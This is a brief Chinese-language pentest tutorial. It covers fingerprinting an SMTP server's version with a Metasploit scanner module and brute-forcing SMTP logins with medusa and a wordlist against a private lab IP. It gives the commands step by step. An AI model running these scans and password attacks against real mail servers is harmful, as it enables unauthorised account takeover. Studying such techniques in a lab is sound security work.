smtp版本信息获取
使用metasploit中的smtp-version模块探测smtp服务的版本信息。
目标:192.168.42.137
use auxiliary/scanner/smtp/smtp_version
show options
set rhosts 192.168.42.137
show options
exploit
通过msf,我们就获取到了smtp的版本信息
medusa工具介绍
medusa是一款用来破解不同协议用户名和密码的专用软件。
medusa破解smtp
medusa -h 目标IP地址 -u 用户名 -P 字典文件 -M 协议模块
medusa-h 192.168.42.137 -u test -P /home/kali/Desktop/user.txt -M smtp
medusa -d
//medusa所支持的模块
在探测的过程中,我们也可以使用wireshark进行抓包分析,筛选出smtp
我们很快就获得了对应的数据包,如果说,我们探测出用户名,我们就可以使用用户名和密码登录smtp,进行对应的操作